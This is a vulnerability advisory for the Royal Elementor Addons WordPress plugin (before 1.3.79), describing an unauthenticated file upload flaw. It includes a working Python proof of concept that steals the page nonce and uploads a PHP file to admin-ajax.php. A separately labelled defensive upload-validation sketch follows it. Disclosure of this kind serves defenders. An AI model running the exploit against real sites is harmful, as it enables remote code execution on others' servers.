WordPress Plugin Vulnerabilities
Royal Elementor Addons and Templates < 1.3.79 - Unauthenticated Arbitrary File Upload
Description
The plugin does not properly validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP files, and achieve remote code execution (RCE).
Proof of Concept
Make sure you have Elementor installed and a page or post edited with Elementor. Here's the Python script that will execute the exploit.

import io
import re
import sys
from urllib import parse

import requests

if len(sys.argv) != 2:
    print('USAGE: python %s <target_elementor_page>' % (sys.argv[0],))
    sys.exit()

elementor_url = sys.argv[1].rstrip('/')
parsed_url = parse.urlparse(elementor_url)
root_url = f'{parsed_url.scheme}://{parsed_url.netloc}'

with requests.Session() as s:
    # The plugin nonce is embedded in the page's WprConfig JavaScript object.
    print('# Getting nonce..')
    page = s.get(elementor_url).text
    match = re.search(r'WprConfig = \{.*"nonce":"([a-f0-9]+)"', page)
    if match is None:
        print('Error: Couldn\'t get nonce.')
        sys.exit()
    nonce = match.group(1)

    print('# Uploading shell..')
    shell = io.BytesIO(b'<?php phpinfo();')
    # File type and size limits are taken from the request, so the client controls them.
    data = {
        'wpr_addons_nonce': nonce,
        'max_file_size': 100,
        'allowed_file_types': ',',
        'action': 'wpr_addons_upload_file',
        'triggering_event': 'click',
    }
    file = {
        'uploaded_file': ('phpinfo.php.', shell),
    }
    print(s.post(f'{root_url}/wp-admin/admin-ajax.php', data=data, files=file).text)
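As an added example (not code from the page or from the plugin), the following Python sketch shows the server-side checks an upload handler of this kind needs: the extension allowlist and size cap live on the server instead of being read from the request, and a name such as phpinfo.php. is normalized before its extension is examined. The allowed and blocked extension sets and the size limit are assumptions chosen for illustration.

```python
import os
import re

# Assumed server-side policy. The vulnerable handler instead honoured the
# client-supplied 'allowed_file_types' (',' meaning anything) and 'max_file_size'.
SAFE_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}
DANGEROUS_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar", "htaccess"}
MAX_UPLOAD_BYTES = 5 * 1024 * 1024
PHP_OPEN_TAG = re.compile(rb"<\?(php|=)")


def naive_extension(filename):
    """An extension check that only looks past the last dot: 'phpinfo.php.' -> ''."""
    return filename.rsplit(".", 1)[1].lower() if "." in filename else ""


def normalize_filename(filename):
    """Keep the basename and strip trailing dots/spaces that filesystems may drop on write."""
    name = os.path.basename(filename.replace("\\", "/"))
    return name.rstrip(". ").strip()


def validate_upload(filename, data, client_allowed_types=None, client_max_size=None):
    """Return (ok, reason). Client-supplied limits are accepted but deliberately ignored."""
    name = normalize_filename(filename)
    if not name or name.startswith("."):
        return False, "empty or hidden filename"
    parts = name.lower().split(".")
    if len(parts) < 2:
        return False, "no extension"
    exts = parts[1:]
    # Reject an executable extension anywhere in the name (shell.php.png, phpinfo.php.).
    if any(e in DANGEROUS_EXTENSIONS for e in exts):
        return False, "executable extension"
    if exts[-1] not in SAFE_EXTENSIONS:
        return False, f"extension .{exts[-1]} not in server allowlist"
    if len(data) > MAX_UPLOAD_BYTES:
        return False, "file exceeds server size limit"
    if PHP_OPEN_TAG.search(data):
        return False, "PHP open tag in file body"
    return True, "ok"
```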
Miscellaneous
Original Researcher
Fioravante Souza
Submitter
Fioravante Souza
Verified
Yes
Timeline
Publicly Published
2023-10-09
Added
2023-10-09
Last Updated
2023-10-09